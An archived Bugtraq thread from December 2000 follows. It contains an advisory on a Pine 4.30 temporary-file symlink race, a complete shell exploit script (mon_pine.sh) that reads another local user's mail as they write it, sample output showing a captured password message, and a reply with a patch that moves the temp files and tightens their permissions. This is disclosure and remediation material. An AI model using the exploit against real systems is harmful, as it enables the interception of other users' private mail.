5845490 2000-12-11 17:43 +0900 /103 rader/ JW Oh <mat@IVNTECH.COM> Sänt av: joel@lysator.liu.se Importerad: 2000-12-11 20:41 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: mat@IVNTECH.COM Mottagare: Bugtraq (import) <14150> Ärende: [hacksware]Pine temporary file hijacking vulnerability ------------------------------------------------------------ From: JW Oh <mat@IVNTECH.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.LNX.4.30.0012111741270.7292-100000@ivntech.com> Hacksware Bug Report 1. Name: Pine temporary file hijacking vulnerability 2. Release Date: 2000.12.11 3. Affected Application: Pine Version 4.30(or maybe other versions) 4. Author: mat@hacksware.com 5. Type: Local Race Condition 6. Explanation If pine setting is like following: [x] enable-alternate-editor-cmd [x] enable-alternate-editor-implicitly editor = /usr/bin/vi pine creates it's temporary in in /tmp directory with names like /tmp/pico.007292(where 7292 is the pid of pine process running). You can simply symlink this file(/tmp/pico.<pid>) to another file that doesn't exist. When victim is editing message victim editor vi follows symlinks and creates another file. By removing this symlink and creating your own temporary file and making it writable to victim, you can hijack his mail message. 7. Exploits --------------------mon_pine.sh start-------------------------------- #!/bin/sh # Grab local pine messages # Usage: ./mon_pine.sh <pid of pine process> # victim pine must use following settings # # mat@hacksware.com # http://hacksware.com # # [x] enable-alternate-editor-cmd # [x] enable-alternate-editor-implicitly # editor = /usr/bin/vi # PID=$1 PICO_FILE=`printf "/tmp/pico.%.6d" $PID` TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"` echo PICO_FILE is $PICO_FILE #if $PICO_FILE and $TRASHCAN exists, remove them if test -f $PICO_FILE then rm -f $PICO_FILE fi if test -f $TRASHCAN then rm -f $TRASHCAN fi ln -s $TRASHCAN $PICO_FILE while : do if test -f $TRASHCAN then break fi done echo Victim is Editing Pine Message rm -f $PICO_FILE echo We replace temporary file touch $PICO_FILE chmod 777 $PICO_FILE echo "Get the message from "$PICO_FILE echo "^C to break tailer" tail -f $PICO_FILE --------------------mon_pine.sh end -------------------------------- 8. Example [mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep 7292 pts/1 S 0:22 pine [mat@overheaven /tmp]$ sh mon_pine.sh 7292 PICO_FILE is /tmp/pico.007292 ... wait for victim to compose mail.... Victim is Editing Mail We replace temporary file Get the message from /tmp/pico.007292 ^C to break tailer Hello... Your new password is "greenbee" Don't let anyone know this... Thanks.. -- ================================================= | mat@hacksware.com | | http://hacksware.com | ================================================= (5845490) --------------------------------(Ombruten) 5864806 2000-12-14 17:12 +0100 /14 rader/ Andrzej Chabierski <outsider@LANGUSTA.STARNET.PL> Sänt av: joel@lysator.liu.se Importerad: 2000-12-15 22:28 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: outsider@LANGUSTA.STARNET.PL Mottagare: Bugtraq (import) <14238> Kommentar till text 5856699 av Peter W <peterw@USA.NET> Ärende: Re: where user temp files should go, env var names ------------------------------------------------------------ hello this patch shoot off this problem wher is the TMP file or somting else... Autor this patch is Mikolaj Rydzewski Patch in attachment /----------------------------------\ /----------------------------------\ | Andrzej Chabierski |__| ~OutSideR~ outsider@ariadna.pl | | Technical University of Szczecin __ kom: 606-191-311 ICQ:26136043 | | Network Administrator | | Linux Registered User #182054 | \----------------------------------/ \----------------------------------/ (5864806) --------------------------------(Ombruten) Bilaga (text/plain) i text 5864807 5864807 2000-12-14 17:12 +0100 /22 rader/ Andrzej Chabierski <outsider@LANGUSTA.STARNET.PL> Bilagans filnamn: "pine-4.30-patch" Importerad: 2000-12-15 22:28 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: outsider@LANGUSTA.STARNET.PL Mottagare: Bugtraq (import) <14239> Bilaga (text/plain) till text 5864806 Ärende: Bilaga (pine-4.30-patch) till: Re: where user temp files should go, env var names ------------------------------------------------------------ diff -Nru pine4.30.orig/imap/src/osdep/unix/env_unix.c pine4.30/imap/src/osdep/unix/env_unix.c --- pine4.30.orig/imap/src/osdep/unix/env_unix.c Wed Oct 25 03:43:40 2000 +++ pine4.30/imap/src/osdep/unix/env_unix.c Tue Nov 7 13:18:05 2000 @@ -55,7 +55,7 @@ /* default directory protection */ static long dir_protection = 0700; /* default lock file protection */ -static long lock_protection = 0666; +static long lock_protection = 0600; /* default ftp file protection */ static long ftp_protection = 0644; /* default public file protection */ @@ -1033,7 +1033,7 @@ #ifdef CHROOT_SERVER "", #else - "/tmp", + (*myhomedir()) ? myhomedir() : "/tmp", #endif (unsigned long) sbuf->st_dev,(unsigned long) sbuf->st_ino); while (T) { /* until get a good lock */ (5864807) --------------------------------(Ombruten)